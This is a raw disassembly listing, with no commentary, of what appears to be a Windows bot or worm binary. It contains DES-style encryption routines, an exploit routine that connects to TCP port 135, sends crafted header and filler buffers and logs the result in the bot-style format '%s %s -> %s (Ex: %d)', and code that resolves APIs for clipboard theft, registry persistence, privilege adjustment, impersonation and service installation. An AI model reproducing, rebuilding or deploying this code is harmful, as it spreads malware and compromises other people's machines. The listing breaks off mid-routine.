mov eax, [eax]
mov ecx, [ecx]
mov esi, eax
and esi, 0FC0h
mov edi, eax
shl esi, 4
and edi, 0FC0000h
mov ebx, ecx
or esi, edi
mov edi, ecx
shr edi, 4
and edi, 0FC000h
and ebx, 0FC0h
or edi, ebx
shl esi, 6
shr edi, 6
or esi, edi
mov [edx], esi
mov esi, eax
and esi, 3Fh
and eax, 3F000h
shl esi, 4
or esi, eax
mov eax, ecx
shr eax, 4
shl esi, 0Ch
and eax, 3F00h
and ecx, 3Fh
or esi, eax
add edx, 4
or esi, ecx
mov [edx], esi
add edx, 4
dec [ebp+var_4]
jnz short loc_40B07F
lea eax, [ebp+var_84]
push eax
call sub_40B107
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40B066 endp
; =============== S U B R O U T I N E =======================================
sub_40B107 proc near ; CODE XREF: sub_40B066+96�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, offset dword_454140
loc_40B110: ; CODE XREF: sub_40B107+18�j
mov edx, [ecx]
add ecx, 4
mov [eax], edx
add eax, 4
cmp eax, offset dword_4541C0
jb short loc_40B110
retn
sub_40B107 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B122 proc near ; CODE XREF: sub_420688+49�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_40B152
lea eax, [ebp+var_8]
push offset dword_454140
push eax
call sub_40B1D8
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
call sub_40B19F
add esp, 18h
leave
retn
sub_40B122 endp
; =============== S U B R O U T I N E =======================================
sub_40B152 proc near ; CODE XREF: sub_40B122+C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
movzx edx, byte ptr [ecx]
shl edx, 18h
inc ecx
mov [eax], edx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
or [eax], edx
inc ecx
add eax, 4
movzx edx, byte ptr [ecx]
shl edx, 18h
inc ecx
mov [eax], edx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
mov edx, [eax]
movzx ecx, byte ptr [ecx+1]
or ecx, edx
mov [eax], ecx
retn
sub_40B152 endp
; =============== S U B R O U T I N E =======================================
sub_40B19F proc near ; CODE XREF: sub_40B122+26�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
mov dl, [ecx+3]
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov dl, [ecx]
inc eax
add ecx, 4
mov [eax], dl
mov dl, [ecx+3]
inc eax
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov cl, [ecx]
mov [eax+1], cl
retn
sub_40B19F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1D8 proc near ; CODE XREF: sub_40B122+1A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edx, [eax]
mov ecx, [eax+4]
mov eax, edx
mov esi, 0F0F0F0Fh
shr eax, 4
mov edi, ecx
and eax, esi
and edi, esi
mov [ebp+var_4], 8
xor eax, edi
xor ecx, eax
shl eax, 4
xor edx, eax
mov esi, ecx
mov eax, edx
and esi, 0FFFFh
shr eax, 10h
xor eax, esi
mov esi, 33333333h
xor ecx, eax
shl eax, 10h
xor edx, eax
mov eax, ecx
shr eax, 2
mov edi, edx
and eax, esi
and edi, esi
mov esi, 0FF00FFh
xor eax, edi
xor edx, eax
shl eax, 2
xor ecx, eax
mov edi, edx
mov eax, ecx
and edi, esi
shr eax, 8
and eax, esi
xor eax, edi
xor edx, eax
shl eax, 8
xor ecx, eax
mov eax, ecx
add ecx, ecx
shr eax, 1Fh
or eax, ecx
mov ecx, eax
xor ecx, edx
and ecx, 0AAAAAAAAh
xor edx, ecx
xor eax, ecx
mov ecx, edx
add edx, edx
shr ecx, 1Fh
or ecx, edx
loc_40B26F: ; CODE XREF: sub_40B1D8+1BA�j
mov edi, [ebp+arg_4]
mov esi, eax
mov edx, eax
shl esi, 1Ch
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
mov ebx, esi
shr edx, 18h
and edx, 3Fh
shr ebx, 10h
mov edx, dword_435D40[edx*4]
and ebx, 3Fh
or edx, dword_435F40[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edx, dword_436140[ebx*4]
or edx, dword_436340[esi*4]
mov esi, [edi]
add edi, 4
xor esi, eax
mov [ebp+arg_4], edi
mov edi, esi
shr edi, 18h
mov ebx, esi
and edi, 3Fh
shr ebx, 10h
mov edi, dword_435E40[edi*4]
and ebx, 3Fh
or edi, dword_436040[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edi, dword_436240[ebx*4]
or edi, dword_436440[esi*4]
or edi, edx
xor ecx, edi
mov edi, [ebp+arg_4]
mov esi, ecx
mov edx, ecx
shl esi, 1Ch
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
mov ebx, esi
shr edx, 18h
and edx, 3Fh
shr ebx, 10h
mov edx, dword_435D40[edx*4]
and ebx, 3Fh
or edx, dword_435F40[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edx, dword_436140[ebx*4]
or edx, dword_436340[esi*4]
mov esi, [edi]
add edi, 4
xor esi, ecx
mov [ebp+arg_4], edi
mov edi, esi
shr edi, 18h
mov ebx, esi
and edi, 3Fh
shr ebx, 10h
mov edi, dword_435E40[edi*4]
and ebx, 3Fh
or edi, dword_436040[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edi, dword_436240[ebx*4]
and esi, 3Fh
or edi, dword_436440[esi*4]
or edi, edx
xor eax, edi
dec [ebp+var_4]
jnz loc_40B26F
mov edx, eax
shl edx, 1Fh
shr eax, 1
or edx, eax
mov eax, edx
xor eax, ecx
and eax, 0AAAAAAAAh
xor ecx, eax
xor edx, eax
mov esi, ecx
mov edi, edx
shl esi, 1Fh
shr ecx, 1
or esi, ecx
mov ecx, 0FF00FFh
mov eax, esi
and edi, ecx
shr eax, 8
and eax, ecx
mov ecx, 33333333h
xor eax, edi
xor edx, eax
shl eax, 8
xor esi, eax
mov edi, edx
mov eax, esi
and edi, ecx
shr eax, 2
and eax, ecx
xor eax, edi
xor edx, eax
shl eax, 2
xor esi, eax
mov eax, edx
mov ecx, esi
shr eax, 10h
and ecx, 0FFFFh
xor eax, ecx
mov ecx, 0F0F0F0Fh
xor esi, eax
shl eax, 10h
xor edx, eax
mov edi, esi
mov eax, edx
and edi, ecx
shr eax, 4
and eax, ecx
mov ecx, [ebp+arg_0]
xor eax, edi
mov edi, eax
shl edi, 4
xor edi, edx
xor eax, esi
mov [ecx], edi
pop edi
pop esi
mov [ecx+4], eax
pop ebx
leave
retn
sub_40B1D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B427 proc near ; CODE XREF: sub_40B63F+7E�p
var_2008 = byte ptr -2008h
var_1FE4 = byte ptr -1FE4h
var_1FD8 = byte ptr -1FD8h
var_1F31 = byte ptr -1F31h
var_1008 = byte ptr -1008h
var_1000 = dword ptr -1000h
var_FF8 = dword ptr -0FF8h
var_F88 = dword ptr -0F88h
var_F84 = dword ptr -0F84h
var_F54 = dword ptr -0F54h
var_F50 = dword ptr -0F50h
var_F38 = dword ptr -0F38h
var_E7C = dword ptr -0E7Ch
var_CA8 = dword ptr -0CA8h
var_CA0 = dword ptr -0CA0h
var_C98 = byte ptr -0C98h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_D0 = dword ptr 0D8h
arg_D4 = dword ptr 0DCh
push ebp
mov ebp, esp
mov eax, 2008h
call sub_4220C0
push esi
push edi
mov edi, dword_436A5C
mov esi, 0A7h
test edi, edi
mov [ebp+var_4], esi
jnz short loc_40B44F
xor eax, eax
jmp loc_40B63B
; ---------------------------------------------------------------------------
loc_40B44F: ; CODE XREF: sub_40B427+1F�j
push ebx
push 30h
lea eax, [ebp+var_2008]
push offset off_436A28
push eax
call sub_4223F0
push esi
lea eax, [ebp+var_1FD8]
push 0FFFFFF90h
push eax
call sub_4221F0
mov ebx, offset dword_432980
push edi
lea eax, [ebp+var_1F31]
push ebx
push eax
call sub_4223F0
lea esi, [edi+0D7h]
jmp short loc_40B4C9
; ---------------------------------------------------------------------------
loc_40B48D: ; CODE XREF: sub_40B427+B0�j
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2008]
inc esi
push offset off_436A28
push eax
mov [ebp+var_4], esi
call sub_4223F0
push esi
lea eax, [ebp+var_1FD8]
push 0FFFFFF90h
push eax
call sub_4221F0
push edi
lea eax, [ebp+esi+var_1FD8]
push ebx
push eax
call sub_4223F0
lea esi, [esi+edi+30h]
loc_40B4C9: ; CODE XREF: sub_40B427+64�j
add esp, 24h
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_40B48D
xor eax, eax
cmp [ebp+arg_D4], 3
push 4
setnz al
dec eax
and ax, 0FCD7h
add eax, 10016C6h
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1FE4]
push eax
call sub_4223F0
push 360h
lea eax, [ebp+var_1008]
push offset dword_436590
push eax
call sub_4223F0
push 10h
lea eax, [ebp+var_CA8]
push offset dword_4368F4
push eax
call sub_4223F0
lea eax, [ebp+var_2008]
push esi
push eax
lea eax, [ebp+var_C98]
push eax
call sub_4223F0
lea edi, [esi+370h]
push 3Ch
push offset off_436908
lea eax, [ebp+edi+var_1008]
push eax
call sub_4223F0
add edi, 3Ch
push 30h
push offset dword_436948
lea eax, [ebp+edi+var_1008]
push eax
call sub_4223F0
mov eax, esi
add edi, 30h
cdq
sub eax, edx
add esp, 48h
sar eax, 1
add [ebp+var_CA8], eax
add [ebp+var_CA0], eax
mov eax, [ebp+var_1000]
lea eax, [eax+esi-0Ch]
mov [ebp+var_1000], eax
mov eax, [ebp+var_FF8]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF8], eax
mov eax, [ebp+var_F88]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F88], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F54]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F54], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F38]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F38], eax
mov eax, [ebp+var_E7C]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E7C], eax
call sub_422F79
mov ebx, eax
push esi
push 0
push ebx
call sub_4221F0
lea eax, [ebp+var_1008]
push edi
push eax
push ebx
call sub_4223F0
mov eax, [ebp+arg_D0]
add esp, 1Ch
mov [eax], edi
mov eax, ebx
pop ebx
loc_40B63B: ; CODE XREF: sub_40B427+23�j
pop edi
pop esi
leave
retn
sub_40B427 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B63F proc near ; CODE XREF: sub_401906+13A�p
; DATA XREF: .text:off_43208C�o
var_1018 = byte ptr -1018h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C0 = dword ptr 0C8h
arg_D0 = dword ptr 0D8h
push ebp
mov ebp, esp
mov eax, 1018h
call sub_4220C0
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
push 1
push eax
call sub_401AB3
pop ecx
mov esi, eax
pop ecx
push 0
push 1
push 2
call dword_454394 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_40B74B
push 10h
lea eax, [ebp+var_18]
push 0
push eax
call sub_4221F0
add esp, 0Ch
mov [ebp+var_18], 2
push 87h
call dword_454314 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+arg_8]
push eax
call dword_45434C ; inet_addr
mov [ebp+var_14], eax
lea eax, [ebp+var_8]
push esi
push eax
sub esp, 0D0h
lea esi, [ebp+arg_8]
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_40B427
mov ebx, dword_42F15C
add esp, 0D8h
mov esi, eax
push 7D0h
call ebx ; dword_42F15C
test esi, esi
jnz short loc_40B6E0
push [ebp+var_4]
jmp short loc_40B745
; ---------------------------------------------------------------------------
loc_40B6E0: ; CODE XREF: sub_40B63F+9A�j
mov edi, [ebp+var_4]
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40B6F8
loc_40B6F5: ; CODE XREF: sub_40B63F+D5�j
push esi
jmp short loc_40B73E
; ---------------------------------------------------------------------------
loc_40B6F8: ; CODE XREF: sub_40B63F+B4�j
push 0
push 48h
push offset dword_436540
push edi
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40B716
push 1F4h
call ebx ; dword_42F15C
jmp short loc_40B6F5
; ---------------------------------------------------------------------------
loc_40B716: ; CODE XREF: sub_40B63F+CC�j
push 0
lea eax, [ebp+var_1018]
push 1000h
push eax
push edi
call dword_454330 ; recv
push 0
push [ebp+var_8]
push esi
push edi
call dword_454350 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40B752
loc_40B73E: ; CODE XREF: sub_40B63F+B7�j
call sub_4230B3
pop ecx
push edi
loc_40B745: ; CODE XREF: sub_40B63F+9F�j
call dword_4543AC ; closesocket
loc_40B74B: ; CODE XREF: sub_40B63F+31�j
xor eax, eax
jmp loc_40B7D7
; ---------------------------------------------------------------------------
loc_40B752: ; CODE XREF: sub_40B63F+FD�j
call sub_4230B3
pop ecx
push edi
call dword_4543AC ; closesocket
push 64h
call ebx ; dword_42F15C
movzx eax, word_439014
push eax
lea esi, [ebp+arg_8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
test eax, eax
jz short loc_40B7D4
push 7D0h
call ebx ; dword_42F15C
mov eax, [ebp+arg_C0]
lea eax, [eax+eax*8]
shl eax, 3
lea ecx, dword_432090[eax]
inc dword ptr [ecx]
cmp [ebp+arg_D0], 0
mov ecx, [ecx]
jz short loc_40B7D4
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_432069[eax]
push ecx
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSSSExD ; "%s %s -> %s (Ex: %d)"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 1Ch
loc_40B7D4: ; CODE XREF: sub_40B63F+149�j
; sub_40B63F+16F�j
xor eax, eax
inc eax
loc_40B7D7: ; CODE XREF: sub_40B63F+10E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B63F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 197Ch
call sub_4220C0
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
call sub_4221F0
push 2
lea eax, [ebp+10h]
pop esi
push eax
mov [ebp-14h], si
call sub_4140CF
add esp, 10h
mov [ebp-10h], eax
push 87h
call dword_42F2B8 ; ntohs
push edi
push edi
push edi
push 6
push 1
push esi
mov [ebp-12h], ax
call dword_42F2A0 ; WSASocketA
mov ebx, eax
cmp ebx, edi
mov [ebp-4], ebx
jnz short loc_40B83D
push edi
call dword_42F150 ; ExitThread
loc_40B83D: ; CODE XREF: .text:0040B834�j
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call dword_42F294 ; connect
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40B856
call dword_42F150 ; ExitThread
loc_40B856: ; CODE XREF: .text:0040B84E�j
push 48h
push offset dword_436A60
push ebx
call dword_42F288 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_40B870
call dword_42F150 ; ExitThread
loc_40B870: ; CODE XREF: .text:0040B868�j
lea eax, [ebp-197Ch]
push 1000h
push eax
push ebx
call dword_42F28C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_40B88F
push edi
call dword_42F150 ; ExitThread
loc_40B88F: ; CODE XREF: .text:0040B886�j
mov ebx, 168h
loc_40B894: ; CODE XREF: .text:0040B8A9�j
push 7Ah
push 61h
call sub_41409E
mov [ebp+edi-17Ch], al
inc edi
pop ecx
cmp edi, ebx
pop ecx
jl short loc_40B894
push 0Ah
lea eax, [ebp-90h]
push offset loc_436B50
push eax
call sub_4223F0
push esi
lea eax, [ebp-86h]
push offset dword_436BA0
push eax
call sub_4223F0
push 4
lea eax, [ebp-82h]
pop edi
push edi
push offset dword_436B98
push eax
call sub_4223F0
push esi
lea eax, [ebp-4Ah]
push offset dword_436B9C
push eax
call sub_4223F0
push edi
lea eax, [ebp-46h]
push offset dword_436B94
push eax
call sub_4223F0
push 0Bh
lea eax, [ebp-42h]
push offset loc_436B44
push eax
call sub_4223F0
add esp, 48h
lea eax, [ebp-97Ch]
push 18h
push offset dword_436AAC
push eax
call sub_4223F0
push 44h
lea eax, [ebp-964h]
push offset dword_436AC8
push eax
call sub_4223F0
mov esi, 90h
push 20h
lea eax, [ebp-920h]
push esi
push eax
call sub_4221F0
push edi
lea eax, [ebp-900h]
push offset loc_436B5C
push eax
call sub_4223F0
push edi
lea eax, [ebp-8FCh]
push offset dword_436B90
push eax
call sub_4223F0
push edi
lea eax, [ebp-8F8h]
push offset dword_436B88
push eax
call sub_4223F0
add esp, 48h
lea eax, [ebp-8F4h]
push edi
push offset loc_436B8C
push eax
call sub_4223F0
push 58h
lea eax, [ebp-8F0h]
push esi
push eax
call sub_4221F0
push 6
lea eax, [ebp-898h]
push offset loc_436B64
push eax
call sub_4223F0
push 8
lea eax, [ebp-892h]
push esi
push eax
call sub_4221F0
push edi
lea eax, [ebp-88Ah]
push offset loc_436B6C
push eax
call sub_4223F0
push edi
lea eax, [ebp-886h]
push esi
push eax
call sub_4221F0
add esp, 48h
lea eax, [ebp-882h]
push 6
push offset loc_436B74
push eax
call sub_4223F0
push 28Eh
lea eax, [ebp-87Ch]
push esi
push eax
call sub_4221F0
push 158h
lea eax, [ebp-5EEh]
push offset dword_432980
push eax
call sub_4223F0
lea eax, [ebp-17Ch]
push ebx
push eax
lea eax, [ebp-496h]
push eax
call sub_4223F0
push 0Ah
lea eax, [ebp-32Eh]
push offset off_436B7C
push eax
call sub_4223F0
push 32h
lea eax, [ebp-324h]
push offset dword_436B10
push eax
call sub_4223F0
add esp, 48h
xor ebx, ebx
mov eax, 68Ah
mov dword ptr [ebp-96Ch], 672h
push ebx
mov [ebp-974h], eax
push eax
lea eax, [ebp-97Ch]
push eax
push dword ptr [ebp-4]
call dword_42F288 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40BA9C
push ebx
call dword_42F150 ; ExitThread
loc_40BA9C: ; CODE XREF: .text:0040BA93�j
movzx eax, word_439014
push eax
lea esi, [ebp+10h]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
test eax, eax
jz short loc_40BB10
push 7D0h
call dword_42F15C ; Sleep
mov eax, [ebp+0C8h]
lea eax, [eax+eax*8]
shl eax, 3
lea ecx, dword_432090[eax]
inc dword ptr [ecx]
cmp [ebp+0D8h], ebx
mov ecx, [ecx]
jz short loc_40BB10
push ecx
lea ecx, [ebp+10h]
lea eax, dword_432069[eax]
push ecx
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSSSExD ; "%s %s -> %s (Ex: %d)"
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 1Ch
loc_40BB10: ; CODE XREF: .text:0040BAC1�j
; .text:0040BAEA�j
push ebx
lea eax, [ebp-197Ch]
push 1000h
push eax
push dword ptr [ebp-4]
call dword_42F28C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_40BB32
push ebx
call dword_42F150 ; ExitThread
loc_40BB32: ; CODE XREF: .text:0040BB29�j
push dword ptr [ebp-4]
call dword_42F298 ; closesocket
push 1
call dword_42F150 ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_40BB43 proc near ; CODE XREF: sub_4120E9+B�p
push ebx
push esi
push edi
push offset aKernel32_dll_1 ; "kernel32.dll"
call dword_42F074 ; GetModuleHandleA
mov esi, dword_42F13C
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_40BC55
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; dword_42F13C
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4543C0, eax
call esi ; dword_42F13C
push offset aProcess32first ; "Process32First"
push edi
mov dword_454338, eax
call esi ; dword_42F13C
push offset aProcess32next ; "Process32Next"
push edi
mov dword_454318, eax
call esi ; dword_42F13C
push offset aModule32first ; "Module32First"
push edi
mov dword_454214, eax
call esi ; dword_42F13C
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4541C0, eax
call esi ; dword_42F13C
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4541E8, eax
call esi ; dword_42F13C
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_454268, eax
call esi ; dword_42F13C
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_45436C, eax
call esi ; dword_42F13C
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4543D4, eax
call esi ; dword_42F13C
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_454220, eax
call esi ; dword_42F13C
push offset aGetcomputernam ; "GetComputerNameA"
push edi
mov dword_454200, eax
call esi ; dword_42F13C
cmp dword_4543C0, ebx
mov dword_454354, eax
jz short loc_40BC60
cmp dword_454338, ebx
jz short loc_40BC60
cmp dword_454318, ebx
jz short loc_40BC60
cmp dword_454214, ebx
jz short loc_40BC60
cmp dword_4541E8, ebx
jz short loc_40BC60
cmp dword_454268, ebx
jz short loc_40BC60
cmp dword_45436C, ebx
jz short loc_40BC60
cmp dword_4543D4, ebx
jz short loc_40BC60
cmp dword_454220, ebx
jz short loc_40BC60
cmp dword_454200, ebx
jz short loc_40BC60
cmp eax, ebx
jnz short loc_40BC6A
jmp short loc_40BC60
; ---------------------------------------------------------------------------
loc_40BC55: ; CODE XREF: sub_40BB43+1A�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_4543DC, eax
loc_40BC60: ; CODE XREF: sub_40BB43+C2�j
; sub_40BB43+CA�j ...
mov dword_4543D8, 1
loc_40BC6A: ; CODE XREF: sub_40BB43+10E�j
push ebp
mov ebp, dword_42F138
push offset aUser32_dll ; "user32.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz loc_40BD3D
push offset aClosewindow ; "CloseWindow"
push edi
call esi ; dword_42F13C
push offset aSendmessagea ; "SendMessageA"
push edi
mov dword_45427C, eax
call esi ; dword_42F13C
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_454360, eax
call esi ; dword_42F13C
push offset aIswindow ; "IsWindow"
push edi
mov dword_45431C, eax
call esi ; dword_42F13C
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4542A0, eax
call esi ; dword_42F13C
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4543C4, eax
call esi ; dword_42F13C
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4542D8, eax
call esi ; dword_42F13C
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_454300, eax
call esi ; dword_42F13C
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_454358, eax
call esi ; dword_42F13C
cmp dword_45427C, ebx
mov dword_45423C, eax
jz short loc_40BD48
cmp dword_454360, ebx
jz short loc_40BD48
cmp dword_45431C, ebx
jz short loc_40BD48
cmp dword_4542A0, ebx
jz short loc_40BD48
cmp dword_4543C4, ebx
jz short loc_40BD48
cmp dword_4542D8, ebx
jz short loc_40BD48
cmp dword_454300, ebx
jz short loc_40BD48
cmp dword_454358, ebx
jz short loc_40BD48
cmp eax, ebx
jnz short loc_40BD52
jmp short loc_40BD48
; ---------------------------------------------------------------------------
loc_40BD3D: ; CODE XREF: sub_40BB43+139�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_4543E4, eax
loc_40BD48: ; CODE XREF: sub_40BB43+1BA�j
; sub_40BB43+1C2�j ...
mov dword_4543E0, 1
loc_40BD52: ; CODE XREF: sub_40BB43+1F6�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz loc_40C040
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; dword_42F13C
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_454384, eax
call esi ; dword_42F13C
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4542BC, eax
call esi ; dword_42F13C
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_45433C, eax
call esi ; dword_42F13C
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4541F8, eax
call esi ; dword_42F13C
push offset aRegdeletekeya ; "RegDeleteKeyA"
push edi
mov dword_454260, eax
call esi ; dword_42F13C
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_45428C, eax
call esi ; dword_42F13C
push offset aRegenumkeyexa ; "RegEnumKeyExA"
push edi
mov dword_4542E8, eax
call esi ; dword_42F13C
push offset aRegenumvaluea ; "RegEnumValueA"
push edi
mov dword_454264, eax
call esi ; dword_42F13C
push offset aRegqueryinfoke ; "RegQueryInfoKeyA"
push edi
mov dword_45420C, eax
call esi ; dword_42F13C
cmp dword_454384, ebx
mov dword_4542B4, eax
jz short loc_40BE29
cmp dword_4542BC, ebx
jz short loc_40BE29
cmp dword_45433C, ebx
jz short loc_40BE29
cmp dword_4541F8, ebx
jz short loc_40BE29
cmp dword_454260, ebx
jz short loc_40BE29
cmp dword_45428C, ebx
jz short loc_40BE29
cmp dword_4542E8, ebx
jz short loc_40BE29
cmp dword_45420C, ebx
jz short loc_40BE29
cmp eax, ebx
jnz short loc_40BE33
loc_40BE29: ; CODE XREF: sub_40BB43+2A8�j
; sub_40BB43+2B0�j ...
mov dword_4543E8, 1
loc_40BE33: ; CODE XREF: sub_40BB43+2E4�j
push offset aOpenthreadtoke ; "OpenThreadToken"
push edi
call esi ; dword_42F13C
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
mov dword_454248, eax
call esi ; dword_42F13C
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4542F8, eax
call esi ; dword_42F13C
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4542C4, eax
call esi ; dword_42F13C
cmp dword_454248, ebx
mov dword_454378, eax
jz short loc_40BE83
cmp dword_4542F8, ebx
jz short loc_40BE83
cmp dword_4542C4, ebx
jz short loc_40BE83
cmp eax, ebx
jnz short loc_40BE8D
loc_40BE83: ; CODE XREF: sub_40BB43+32A�j
; sub_40BB43+332�j ...
mov dword_4543E8, 1
loc_40BE8D: ; CODE XREF: sub_40BB43+33E�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; dword_42F13C
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_454304, eax
call esi ; dword_42F13C
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4541D4, eax
call esi ; dword_42F13C
push offset aControlservice ; "ControlService"
push edi
mov dword_4541DC, eax
call esi ; dword_42F13C
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_454244, eax
call esi ; dword_42F13C
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_454250, eax
call esi ; dword_42F13C
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4541F0, eax
call esi ; dword_42F13C
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4542C8, eax
call esi ; dword_42F13C
push offset aCreateservicea ; "CreateServiceA"
push edi
mov dword_4541E0, eax
call esi ; dword_42F13C
push offset aStartservicect ; "StartServiceCtrlDispatcherA"
push edi
mov dword_45437C, eax
call esi ; dword_42F13C
push offset aImpersonatelog ; "ImpersonateLoggedOnUser"
push edi
mov dword_4543D0, eax
call esi ; dword_42F13C
push offset aLockservicedat ; "LockServiceDatabase"
push edi
mov dword_4543C8, eax
call esi ; dword_42F13C
push offset aQueryservicelo ; "QueryServiceLockStatusA"
push edi
mov dword_454208, eax
call esi ; dword_42F13C
push offset aChangeservicec ; "ChangeServiceConfig2A"
push edi
mov dword_454284, eax
call esi ; dword_42F13C
push offset aUnlockserviced ; "UnlockServiceDatabase"
push edi
mov dword_4543CC, eax
call esi ; dword_42F13C
push offset aRegisterservic ; "RegisterServiceCtrlHandlerA"
push edi
mov dword_45432C, eax
call esi ; dword_42F13C
push offset aSetservicestat ; "SetServiceStatus"
push edi
mov dword_454328, eax
call esi ; dword_42F13C
cmp dword_454304, ebx
